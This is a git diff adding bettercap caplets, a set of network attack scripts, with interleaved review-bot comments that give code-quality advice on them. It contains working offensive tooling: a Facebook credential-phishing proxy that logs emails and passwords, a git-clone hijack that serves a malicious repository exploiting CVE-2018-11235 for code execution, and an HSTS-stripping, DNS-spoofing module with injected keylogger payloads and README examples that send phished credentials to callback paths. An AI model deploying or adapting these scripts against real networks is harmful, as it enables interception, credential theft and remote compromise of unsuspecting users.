from 2018-07-27 00-37-40](https://user-images.githubusercontent.com/29265684/43269395-1cc4d330-9136-11e8-941b-f0d9fcb6e254.png) diff --git a/enumerate/hosts/module.cap b/enumerate/hosts/module.cap new file mode 100644 index 0000000..d8db3c3 --- /dev/null +++ b/enumerate/hosts/module.cap 
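Review bot: In onCommand, `regexp`, `saved_events` and `found_events` are assigned without `var`, so they become globals shared with every other script loaded into the same engine, and `new RegExp(...)` on the operator-typed pattern throws a SyntaxError that nothing catches, so a mistyped pattern aborts the command instead of reporting it. Declare them and guard the construction: `try { var regexp = new RegExp(cmd.replace("enumerate.events.regexp ", "")) } catch (e) { log_error("invalid regexp: " + e); return true }`. The same undeclared-variable pattern recurs in enumerate/hosts/module.js, fb-phish/fb-phish.js and gitspoof/gitspoof.js, and the hosts module repeats the unguarded `new RegExp`. Separately, configure() reports "file not found" for an empty events.stream.output as well, since `!readFile(...)` is true for `""`; if readFile signals a missing file differently (for example by returning `null`), test for that instead so a fresh, still-empty session file does not trigger the error.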
@@ -0,0 +1,21 @@
+# enumerate.hosts
+set enumerate.hosts.output enumerate/hosts/session1.hosts.log
+
+# events.stream
+events.stream off
+set events.stream.output enumerate/hosts/session1.events.stream.output
+events.stream on
+
+# net.sniff
+set net.sniff.verbose false
+net.sniff on
+
+# http.proxy
+set http.proxy.script enumerate/hosts/module.js
+set http.proxy.port 8022
+http.proxy on
+
+# ticker
+set ticker.commands enumerate.hosts.save
+set ticker.period 60
+ticker on
diff --git a/enumerate/hosts/module.js b/enumerate/hosts/module.js
new file mode 100644
index 0000000..8f0b01a
--- /dev/null
+++ b/enumerate/hosts/module.js
@@ -0,0 +1,108 @@ +var enumerated_hosts = [] + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function configure() { + if ( !readFile( env("enumerate.hosts.output") ) ) { + log_info("(" + green + "enumerate.hosts" + reset + ") " + bold + "enumerate.hosts.output" + reset + " file was not found, creating one ...") + writeFile( env("enumerate.hosts.output"), "" ) + } + + if ( !readFile( env("events.stream.output") ) ) { + log_error("Error: " + bold + "events.stream.output" + reset + " file not found (got " + env("events.stream.output") + ")") + } +} + +function extractHosts() { + logs = readFile( env("events.stream.output") ).split("\n") + extracted_hosts = [] + + for (var i = 0; i < logs.length; i++) { + if ( logs[i].match(/\[.*?net\.sniff.*?\]/i) ) { + host = logs[i].replace(/.*\033\[33m(https:\/\/|)(.*?)\033\[0m.*/g, "$2") + extracted_hosts.indexOf(host) == -1 ? extracted_hosts.push(host) : "" + } + } + + return extracted_hosts +} + +function compareHosts(old_hosts, new_hosts) { + difference = [] + + for (var i = 0; i < new_hosts.length; i++) { + old_hosts.indexOf(new_hosts[i]) == -1 ? difference.push(new_hosts[i]) : "" + } + + return difference +} + +function saveHosts(new_hosts) { + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + + for (var i = 0; i < new_hosts.length; i++) { + saved_hosts.indexOf(new_hosts[i]) == -1 ? saved_hosts.push(new_hosts[i]) : "" + } + + writeFile( env("enumerate.hosts.output"), saved_hosts.join("\n") ) +} + +function printHosts(hosts) { + if (hosts.length != 0) { + log_string = "" + + for (var i = 0; i < hosts.length; i++) { + log_string += " " + yellow + hosts[i] + reset + "\n" + enumerated_hosts.indexOf(hosts[i]) == -1 ? 
enumerated_hosts.push(hosts[i]) : "" + } + + console.log("\n" + log_string) + } else { + console.log("\n No hosts to display.\n") + } +} + +function onCommand(cmd) { + if (cmd == "enumerate.hosts.all") { + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + printHosts(saved_hosts) + return true + } + + if (cmd == "enumerate.hosts.new") { + new_hosts = compareHosts( enumerated_hosts, extractHosts() ) + printHosts(new_hosts) + return true + } + + if ( cmd.match(/^enumerate\.hosts\.regexp ./) ) { + regexp = new RegExp( cmd.replace("enumerate.hosts.regexp ", "") ) + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + found_hosts = [] + + for (var i = 0; i < saved_hosts.length; i++) { + saved_hosts[i].match(regexp) ? found_hosts.push(saved_hosts[i]) : "" + } + + printHosts(found_hosts) + return true + } + + if (cmd == "enumerate.hosts.save") { + saveHosts( extractHosts() ) + return true + } +} + +function onLoad() { + console.log("\n" + bold + " Commands" + reset + "\n") + console.log(" " + yellow + "enumerate.hosts.all" + reset + " : Enumerate all hosts.") + console.log(" " + yellow + "enumerate.hosts.new" + reset + " : Enumerate new hosts.") + console.log(" " + yellow + "enumerate.hosts.regexp" + reset + " : Enumerate hosts with regexp value.\n") + configure() + log_info("(" + green + "enumerate.hosts" + reset + ") Module successfully loaded.") +} diff --git a/fb-phish/fb-phish.cap b/fb-phish/fb-phish.cap new file mode 100644 index 0000000..8ff3b31 --- /dev/null +++ b/fb-phish/fb-phish.cap @@ -0,0 +1,7 @@ +set http.server.address 0.0.0.0 +set http.server.path www/www.facebook.com/ + +set http.proxy.script fb-phish.js + +http.proxy on +http.server on diff --git a/fb-phish/fb-phish.js b/fb-phish/fb-phish.js new file mode 100644 index 0000000..cb1d57e --- /dev/null +++ b/fb-phish/fb-phish.js 
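Review bot: extractHosts() appends whatever `replace` returns without checking that the yellow-segment pattern matched, and String.replace returns its input unchanged on no match, so any line that passes the `net.sniff` filter but lacks that colour layout is recorded verbatim as a "host" and then persisted by saveHosts into enumerate.hosts.output. Match first and skip non-matches: `var m = logs[i].match(/\033\[33m(?:https:\/\/)?(.*?)\033\[0m/); if (!m) continue; var host = m[1]`. The `\033` escapes in the string literals at the top of the file are legacy octal escapes that strict mode rejects; `\x1b` is the portable spelling. Note also that printHosts() mutates the module-level `enumerated_hosts` as a side effect of printing, so running `enumerate.hosts.all` marks every saved host as already seen for a later `enumerate.hosts.new`; if that is intended, a one-line comment on printHosts saying so would save the next reader a surprise.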
@@ -0,0 +1,28 @@ +var RESET = "\033[0m"; + +function R(s) { + return "\033[31m" + s + RESET; +} + +function B(s) { + return "\033[34m" + s + RESET; +} + +function onRequest(req, res) { + if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) { + var form = req.ParseForm(); + var email = form["email"] || "?", + pass = form["pass"] || "?"; + + log( R(req.Client.IP), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" ); + + headers = res.Headers.split("\r\n") + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, "") + res.RemoveHeader(header_name) + } + res.Status = 301; + res.SetHeader("Location", "https://www.facebook.com") + res.SetHeader("Connection", "close") + } +} diff --git a/gitspoof/README.md b/gitspoof/README.md new file mode 100644 index 0000000..030f316 --- /dev/null +++ b/gitspoof/README.md 
@@ -0,0 +1,58 @@ +# Caplet for exploiting CVE-2018-11235 + +This caplet is intercepting http/https git clone attempts and +redirecting them to local http server that serves a malicious +repository leading to exploitation of CVE-2018-11235 on vulnerable +client. + +## How to use + +1. Create a malicious repository with `build_repo.sh` script. The + script will take the contents of `payload.txt` as payload - + customize the payload file to your needs. +2. Run the caplet with: + +``` +bettercap -caplet caplets/gitspoof/gitspoof.cap +``` + +## Alternative use cases + +You can control to which repository redirect the victim, by changing +`gitspoof.repo` variable to an IP or domain (do not prefix with +http(s)). This way if the victim is not susceptible to CVE-2018-11235 +you can still try to inject arbitrary code into the repo - this might +come in handy when trying to exploit some bad CI/deployment scripts. + +## Limitations + +Obviously the script won't be able to intercept https git clones +unless you can obtain a valid SSL cert or the victim used `-c +http.sslVerify=false` configuration option. + +The script was aimed at attacking automated systems not people +therefore the repo layout doesn't try hard to look inconspicuous ;) + +Attacking human with this caplet would require to also spoof some +trusted domain and point it at bettercap server since Git will always +notify the user about http redirect. + +Finally - all the CVE-2018-11235 limitations apply - to get RCE the +victim needs to have vulnerable git client **and** do a recursive +git clone (or initialize the submodules afterwards). + +## POC testing + +You can test the script yourself without arp poison: + +1. Setup vulnerable git on your system +2. Fire the caplet (remember to run `./build_repo.sh` first!) +3. 
On vulnerable system run: + +``` +http_proxy= git clone --recursive http://github.com/bettercap/bettercap /tmp/exploit +``` + +(**NOTE**: we are intentionally trying to clone via http on github) + +The clone should trigger the default payload. diff --git a/gitspoof/build_repo.sh b/gitspoof/build_repo.sh new file mode 100755 index 0000000..302adf6 --- /dev/null +++ b/gitspoof/build_repo.sh @@ -0,0 +1,28 @@ +#!/bin/bash +evil_submodule="zemodule" +empty_submodule="https://github.com/pielgrzym/noop" + +rm -rf evil_git_repo + +git init evil_git_repo --bare +mv evil_git_repo/hooks/post-update.sample evil_git_repo/hooks/post-update +chmod a+x evil_git_repo/hooks/post-update + +temp_repo=$(mktemp -d) +git clone evil_git_repo $temp_repo +old_dir=$(pwd) +cd $temp_repo +export GIT_WORK_TREE=$temp_repo +mkdir -p fakegit/modules +git submodule add $empty_submodule $evil_submodule +git submodule add $empty_submodule error +mv .git/modules/$evil_submodule fakegit/modules/$evil_submodule +cp $old_dir/payload.txt fakegit/modules/$evil_submodule/hooks/post-checkout +chmod 755 fakegit/modules/$evil_submodule/hooks/post-checkout +git config -f .gitmodules --rename-section submodule.$evil_submodule submodule.../../fakegit/modules/$evil_submodule +sed -i 's/\.git/fakegit/' $evil_submodule/.git + +git add . +git commit -m 'Initial commit' +git push +rm -rf $temp_repo diff --git a/gitspoof/gitspoof.cap b/gitspoof/gitspoof.cap new file mode 100644 index 0000000..e80f06c --- /dev/null +++ b/gitspoof/gitspoof.cap @@ -0,0 +1,9 @@ +set http.server.path caplets/gitspoof/evil_git_repo +http.server on + +set http.proxy.script caplets/gitspoof/gitspoof.js +set https.proxy.script caplets/gitspoof/gitspoof.js +http.proxy on +https.proxy on + +# arp.spoof on diff --git a/gitspoof/gitspoof.js b/gitspoof/gitspoof.js new file mode 100644 index 0000000..1973e08 --- /dev/null +++ b/gitspoof/gitspoof.js 
@@ -0,0 +1,29 @@ +var gitspoof_repo = undefined; + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function onLoad() { + env["gitspoof.repo"] ? gitspoof_repo = env["gitspoof.repo"] : gitspoof_repo = env["iface.ipv4"]; + log( "Gitspoof loaded" ); + log(green +"Git redirect to repo: " + yellow + gitspoof_repo + "/" + reset); +} + +function onResponse(req, res) { + if (req.Query == 'service=git-upload-pack') { + log(bold + "Got git clone request, attempting redirect" + reset); + } + if (req.Query == 'service=git-upload-pack' && req.Hostname != gitspoof_repo) { + res.Status = 301; + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Location", "http://" + gitspoof_repo + "/info/refs?service=git-upload-pack"); + res.Body = ""; + } +} diff --git a/gitspoof/payload.txt b/gitspoof/payload.txt new file mode 100644 index 0000000..fbd21f2 --- /dev/null +++ b/gitspoof/payload.txt @@ -0,0 +1,9 @@ +#!/bin/sh + +echo "pwned with" +echo " ____ _____ _____ _____ _____ ____ ____ _ ____ " +echo "| __ )| ____|_ _|_ _| ____| _ \ / ___| / \ | _ \ " +echo "| _ \| _| | | | | | _| | |_) | | / _ \ | |_) |" +echo "| |_) | |___ | | | | | |___| _ <| |___ / ___ \| __/ " +echo "|____/|_____| |_| |_| |_____|_| \_\\____/_/ \_\_| " + diff --git a/gps.cap b/gps.cap new file mode 100644 index 0000000..7bb8342 --- /dev/null +++ b/gps.cap @@ -0,0 +1,4 @@ +gps on + +# https://www.waveshare.com/wiki/GSM/GPRS/GNSS_HAT +!echo "AT+CGNSPWR=1\nAT+CGNSTST=1" > /dev/ttyUSB0 diff --git a/hstshijack/README.md b/hstshijack/README.md new file mode 100644 index 0000000..5c926f4 --- /dev/null +++ b/hstshijack/README.md @@ -0,0 +1,161 @@ +
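Review bot: onLoad reads `env["gitspoof.repo"]` and `env["iface.ipv4"]` with bracket indexing, whereas the enumerate modules in this same commit call `env("...")` as a function; unless the engine exposes `env` both ways, one of the two forms yields undefined, so it is worth confirming which API the host actually provides and using it consistently across the caplets. The ternary on that line performs an assignment in each branch; `gitspoof_repo = env["gitspoof.repo"] || env["iface.ipv4"];` expresses the same fallback without the side-effecting conditional. In onResponse, `headers` and `header_name` are undeclared (the same leak noted on enumerate/events/module.js) and the loop calls `res.RemoveHeader("")` for the empty element that `split("\r\n")` leaves after the trailing CRLF; declaring them with `var` and skipping empty names with `if (header_name) res.RemoveHeader(header_name);` would tidy this up.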

+ +

+ +### Caplet + +```sh +# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + +# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads' +# variables get precendence over those assigned to the 'hstshijack.ignore' variable. +set hstshijack.targets *.google.com, google.com, gstatic.com, *.gstatic.com +set hstshijack.replacements *.google.corn,google.corn,gstatic.corn,*.gstatic.corn +set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt +set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json +set hstshijack.ssl.check true +#set hstshijack.blockscripts example.com,*.example.com +set hstshijack.obfuscate true +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js +#set hstshijack.ignore * + +set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js +http.proxy on + +set dns.spoof.domains *.google.corn,google.corn,gstatic.corn,*.gstatic.corn +set dns.spoof.all true +dns.spoof on +``` + +### **hijack.js** payload + +This module injects files with a JavaScript payload (**hijack.js**) which acts as a callback for bettercap, and takes care of hostname spoofing in attributes of injected documents, as well as XMLHttpRequest. + +Injecting **hijack.js** is essential for hostname spoofing. + +### Scalable domain indexing (SSL log) + +
+ +

+ +

+ +When hosts respond with an HTTPS redirect, bettercap will save their hostnames in a list and keep track of the index ranges of these hostnames sorted by each character's Unicode code point value, allowing the list to scale by reducing a considerable amount of overhead for the proxy module. + +By default, this caplet will remap the index ranges on launch of all the domains that were found in the file that you assigned to the `hstshijack.ssl.domains` variable (to ensure that it is still in the right format). You can skip this by setting the `hstshijack.ssl.check` variable value to `false`. + +Bettercap will also send a HEAD request to unknown hosts that were discovered in the injected document and retrieved via a callback from the **hijack.js** payload. This is done to learn what hosts use HTTPS, ahead of time. + +Hostnames that you target with the `hstshijack.targets` variable are automatically logged and indexed. + +### Hostname spoofing + +In the **caplet file** you can assign comma separated domains to the `hstshijack.targets` variable. _(wildcard allowed)_ + +For every targeted hostname you must specify a replacement hostname, like this: + +```sh +set hstshijack.targets google.com, *.google.com +set hstshijack.replacements google.corn,*.google.corn +``` + +You can try to make them as unnoticeable as you can, but your options are limited here in terms of evading HSTS. + +### Block scripts + +In the **caplet file** you can block JavaScript from hosts by assigning them to the `hstshijack.blockscripts` variable. _(wildcard allowed)_ + +### Custom payloads + +You can also inject your own scripts into files from your specified hosts by assigning them to the `hstshijack.payloads` variable. + +Custom payloads are (optionally) obfuscated at launch, executed synchronously, and wrapped inside a function that is defined as a property of the current JavaScript context (globalThis). 
This is done to ensure that your payload is only executed once per application, even if injected multiple times. Individual payloads are not failsafe, so you must set your conditions/try and catch blocks yourself. + +Example: + +```sh +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js +``` + +You should always inject the **hijack.js** payload when spoofing hostnames. + +### Obfuscation + +You can write custom payloads that are automatically obfuscated by the module. + +Basically, every word that was found beginning with `obf_` will be obfuscated. + +Example: + +```js +function obf_function() { + alert("Random variable: obf_whatever_follows") +} + +obf_function() +``` + +Will be injected as: + +```js +function jfIleNwmKoa() { + alert("Random variable: AsjZnJWklwMNqshCaloE") +} + +jfIleNwmKoa() +``` + +### Silent callbacks + +You can have your payloads send callbacks to your machine that bettercap will print, but not proxy. + +Example of a silent callback: + +```js +form.onsubmit = function() { + req = new XMLHttpRequest() + req.open("POST", "http://" + location.host + "/obf_path_callback?username=" + username + "&password=" + password) + req.send() +} +``` + +The following POST request will be sniffed by bettercap, but not proxied (the request will be dropped). + +Any instance of `obf_path_callback` will be replaced with the callback path (see example above). + +### Whitelisting callbacks + +You can automatically terminate an attack between specific clients and hosts by making the client's machine initiate a whitelisting callback. + +Example of multiple whitelisting callbacks: + +```js +// Whitelist multiple hosts to ensure the intended resources will load. 
+ +form.onsubmit = function() { + // Whitelist current hostname and phish credentials + req = new XMLHttpRequest() + req.open("POST", "http://" + location.hostname + "/obf_path_whitelist?email=" + email + "&password=" + password) + req.send() + + // Whitelist facebook + req = new XMLHttpRequest() + req.open("POST", "http://facedook.com/obf_path_whitelist") + req.send() + + // Whitelist facebook CDN + req = new XMLHttpRequest() + req.open("POST", "http://static.xx.fdcdn.net/obf_path_whitelist") + req.send() + + // Whitelist redirect to facebook + req = new XMLHttpRequest() + req.open("POST", "http://fd.com/obf_path_whitelist") + req.send() +} +``` + +When a request is sent as above, bettercap will stop spoofing connections between the sender and the requested host. + +If any resource from a spoofed host is requested that was previously whitelisted for that client, then that client will be redirected to the intended (unspoofed) host. diff --git a/hstshijack/domains.txt b/hstshijack/domains.txt new file mode 100644 index 0000000..e69de29 diff --git a/hstshijack/hstshijack.cap b/hstshijack/hstshijack.cap new file mode 100644 index 0000000..93b4b8d --- /dev/null +++ b/hstshijack/hstshijack.cap 
@@ -0,0 +1,21 @@ +# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + +# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads' +# variables get precendence over those assigned to the 'hstshijack.ignore' variable. +set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com +set hstshijack.replacements google.corn,*.google.corn,gstatic.corn,*.gstatic.corn +set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt +set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json +set hstshijack.ssl.check true +#set hstshijack.blockscripts example.com,*.example.com +set hstshijack.obfuscate true +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js +set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com + +set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js +http.proxy on + +set dns.spoof.domains google.corn,*.google.corn,gstatic.corn,*.gstatic.corn +set dns.spoof.all true +dns.spoof on + diff --git a/hstshijack/hstshijack.js b/hstshijack/hstshijack.js new file mode 100644 index 0000000..cc3e505 --- /dev/null +++ b/hstshijack/hstshijack.js 
@@ -0,0 +1,1053 @@ +/* + * Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + */ + +var ssl = { + "domains": [], + "index": {}, + "hierarchy": "-.0123456789abcdefghijklmnopqrstuvwxyz" +}; + +var payload, + payload_container_prefix = ( + "if (!globalThis.{{SESSION_ID_TAG}}) {\n" + + "globalThis.{{SESSION_ID_TAG}} = function() {\n"), + payload_container_suffix = ( + "\n}\n" + + "globalThis.{{SESSION_ID_TAG}}();\n" + + "}\n"); + +var ignore_hosts = [], + target_hosts = [], + replacement_hosts = [], + block_script_hosts = []; + +var payloads = {}, + obfuscate; + +var callback_path, + whitelist_path, + ssl_index_path, + session_id, + varname_target_hosts, + varname_replacement_hosts; + +var math_seed; + +var whitelist = {}; + +var selector_header = /^\s*(.*?)\s*:\s*(.*?)\s*$/, + selector_header_csp = /content-security-policy:.*?\r\n/ig, + selector_header_set_cookie = /^set-cookie$/i, + selector_header_set_cookie_secure_samesite = /^(?:secure$|samesite=)/i, + selector_content_type_html = /text[/](?:html|xml)|application[/](?:hta|xhtml[+]xml|xml)/i, + selector_extension_html = /[.](?:html|htm|xml|xhtml|xhtm|xht|hta)$/i, + selector_meta_tag_csp = / http-equiv=['"]?Content-Security-Policy['"]?([ />])/ig, + selector_strip_whitespace = /^\s*(.*?)\s*$/, + selector_uri_one = /^https:\/\//i, + selector_uri_two = /https:\/\/([^:/?#]*).*/i, + selector_content_type_js = /\S+[/]javascript/i, + selector_html_magic = /^\s*)/ig, + selector_html_script_close_tag = /<\/script(\s|>)/ig, + selector_all_dashes = /\-/g, + selector_all_dots = /\./g, + selector_scheme_http_https_colon = /(http)s:/ig, + selector_port_https = /:443($|[^0-9])/g, + selector_regset_wildcard_one = /^\*\./, + selector_regset_wildcard_two = /\.\*$/, + selector_regset_wildcard_three = /\.\*$/g, + selector_regset_wildcard_four = /\.\*/g, + selector_query_param = /(^[^=]*)=(.*$)/; + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + blue = "\033[34m", + on_white 
= "\033[47;30m", + on_grey = "\033[40;37m", + on_blue = "\033[104;30m", + bold = "\033[1;37m", + reset = "\033[0m"; + +function randomFloat() { + r = Math.sin(math_seed++) * 10000; + return r - Math.floor(r); +} + +function randomString(length) { + length = parseInt(length); + var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + buff = new Array(length); + for (var a = 0; a < buff.length; a++) { + index = parseInt(Math.random() * chars.length); + buff[a] = chars.charAt(index) + } + return buff.join(""); +} + +function toRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dots, "\\."); + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + return [ + new RegExp("(^|[^a-z0-9-.])" + selector_string + "($|[^a-z0-9-.])", "ig"), + "$1" + replacement_string + "$2" + ]; +} + +function toWholeRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dots, "\\."); + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + return [ + new RegExp("^" + selector_string + "$", "ig"), + replacement_string + ]; +} + +function toWildcardRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + if (selector_string.match(selector_regset_wildcard_one)) { + selector_string = selector_string.replace(selector_regset_wildcard_one, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_one, ""); + return [ + new RegExp(selector_string, "ig"), + "$1" + replacement_string + ]; + } else if (selector_string.match(selector_regset_wildcard_two)) { + selector_string = selector_string.replace(selector_regset_wildcard_three, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + 
replacement_string = replacement_string.replace(selector_regset_wildcard_two, ""); + return [ + new RegExp(selector_string, "ig"), + replacement_string + "$1" + ]; + } else { + log_error(on_blue + "hstshijack" + reset + " Invalid toWildcardRegexp() value (got " + selector_string + ")."); + } +} + +function toWholeWildcardRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + if (selector_string.match(selector_regset_wildcard_one)) { + selector_string = selector_string.replace(selector_regset_wildcard_one, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_one, ""); + return [ + new RegExp("^" + selector_string + "$", "ig"), + "$1" + replacement_string + ]; + } else if (selector_string.match(selector_regset_wildcard_two)) { + selector_string = selector_string.replace(selector_regset_wildcard_four, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_two, ""); + return [ + new RegExp(selector_string, "ig"), + replacement_string + "$1" + ]; + } else { + log_error(on_blue + "hstshijack" + reset + " Invalid toWholeWildcardRegexp() value (got " + selector_string + ")."); + } +} + +/* Matches /(^|[^a-z0-9-.])example\.com($|[^a-z0-9-.])/ig */ +function toRegexpSet(selector_string, replacement_string) { + if (selector_string.indexOf("*") !== -1) { + return toWildcardRegexp(selector_string, replacement_string); + } else { + return toRegexp(selector_string, replacement_string); + } +} + +/* Matches ^example.com$ */ +function toWholeRegexpSet(selector_string, replacement_string) { + if (selector_string.indexOf("*") !== -1) { + return toWholeWildcardRegexp(selector_string, replacement_string); + } else { + return 
toWholeRegexp(selector_string, replacement_string); + } +} + +/* Saves the list of domains using SSL, as well as its index ranges. */ +function saveSSLIndex() { + writeFile(env["hstshijack.ssl.domains"], ssl.domains.join("\n")); + writeFile(env["hstshijack.ssl.index"], JSON.stringify(ssl.index, null, 2)); +} + +/* Returns the amount of characters of an identical prefix of two given strings. */ +function getMatchingPrefixLength(string1, string2) { + count = 0; + if (string1.length > string2.length) { + for (a = 0; a < string2.length; a++) { + if (string1.charAt(a) !== string2.charAt(a)) { + break; + } + count++; + } + } else { + for (a = 0; a < string1.length; a++) { + if (string1.charAt(a) !== string2.charAt(a)) { + break; + } + count++; + } + } + return count; +} + +/* Returns true if domain1 gets alphanumeric precendence over domain2. */ +function getsPrecedence(domain1, domain2) { + if (domain1.length > domain2.length) { + /* If the first given domain is longer than the second. */ + for (a = 0; a < domain2.length; a++) { + rank1 = ssl.hierarchy.indexOf(domain1.charAt(a)); + rank2 = ssl.hierarchy.indexOf(domain2.charAt(a)); + if (rank1 > rank2) { + return false; + } else if (rank1 < rank2) { + return true; + } + } + return false; + } else { + /* If the second given domain is longer than the first. */ + for (a = 0; a < domain1.length; a++) { + rank1 = ssl.hierarchy.indexOf(domain1.charAt(a)); + rank2 = ssl.hierarchy.indexOf(domain2.charAt(a)); + if (rank1 > rank2) { + return false; + } else if (rank1 < rank2) { + return true; + } + } + return true; + } +} + +/* Returns an array with the first and last index of an alphanumeric range of domains. + * This is the range in which domains are/will be indexed. */ +function getIndexRange(char) { + if (index_range = ssl.index[char]) { + /* Character is already indexed. */ + return index_range; + } else { + /* Character is not yet indexed. 
*/ + indexed_chars = Object.keys(ssl.index).concat(char).sort(); + this_char_index = indexed_chars.indexOf(char); + if ( + indexed_chars[this_char_index - 1] + && indexed_chars[this_char_index + 1] + ) { + /* Will not be the first nor last indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index + 1]][0], + ssl.index[indexed_chars[this_char_index + 1]][0] + ]; + } else if (indexed_chars[this_char_index + 1]) { + /* Will be the first indexed character, but not the last. */ + return [ + 0, + ssl.index[indexed_chars[this_char_index + 1]][0] + ]; + } else if (indexed_chars[this_char_index - 1]) { + /* Will be the last indexed character, but not the first. */ + if (ssl.domains.length === 1) { + /* Will be the second and last indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index - 1]][1] + 1, + 1 + ]; + } else { + /* Will be the last but not the second indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index - 1]][1] + 1, + ssl.domains.length + ]; + } + } else { + /* Will be the first and last indexed character. */ + return [0, 0]; + } + } +} + +/* Returns the index of a given domain within a given index range. */ +function getDomainIndex(domain, index_range) { + domain = domain.toLowerCase(); + if ( + index_range[0] === index_range[1] + && domain === ssl.domains[index_range[0]] + ) { + /* This domain is the only indexed domain with this first character. */ + return index_range[0]; + } + /* Return this domain's index when found in this index range. */ + for (a = index_range[0]; a < index_range[1] + 1; a++) { + if (domain === ssl.domains[a]) { + return a; + } + } + /* This domain is not indexed. */ + return -1; +} + +/* Index a new domain. */ +function indexDomain(domain) { + domain = domain.toLowerCase(); + first_char = domain.charAt(0); + index_range = getIndexRange(first_char); + if (getDomainIndex(domain, index_range) === -1) { + /* This domain is not indexed yet. 
*/ + log_debug(on_blue + "hstshijack" + reset + " Indexing domain " + bold + domain + reset + " ..."); + indexed_chars = Object.keys(ssl.index); + if (index_range[0] === index_range[1]) { + /* This index range consists of only one index. */ + if (ssl.domains[index_range[0]]) { + /* This index range contains one domain. */ + new_index = index_range[0]; + if (getsPrecedence(ssl.domains[index_range[0]], domain)) { + new_index++; + } + arr_ = ssl.domains.slice(0, new_index); + _arr = ssl.domains.slice(new_index, ssl.domains.length); + ssl.domains = [].concat(arr_, [domain], _arr); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + 1 + ]; + } else { + /* This index range contains no domains. */ + ssl.domains.push(domain); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + ]; + } + } else { + /* This index range consists of multiple domains. */ + new_index = index_range[0]; + for (var a = index_range[0]; a < index_range[1] + 1; a++) { + if (!getsPrecedence(domain, ssl.domains[a])) { + new_index = a + 1; + } else { + break; + } + } + arr_ = ssl.domains.slice(0, new_index); + _arr = ssl.domains.slice(new_index, ssl.domains.length); + ssl.domains = [].concat(arr_, [domain], _arr); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + 1 + ]; + } + remaining_indexed_chars = indexed_chars.slice(index_range[1] + 1); + for (a = 0; a < remaining_indexed_chars.length; a++) { + indexed_char = remaining_indexed_chars[a]; + index_range = ssl.index[indexed_char]; + ssl.index[indexed_char] = [ + index_range[0] + 1, + index_range[1] + 1 + ]; + } + saveSSLIndex(); + } else { + /* This domain is already indexed. */ + log_debug(on_blue + "hstshijack" + reset + " Skipped already indexed domain " + bold + domain + reset); + } +} + +function configure() { + /* Read caplet. */ + env["hstshijack.ignore"] + ? ignore_hosts = env["hstshijack.ignore"].replace(/\s/g, "").split(",") + : ignore_hosts = []; + env["hstshijack.targets"] + ? 
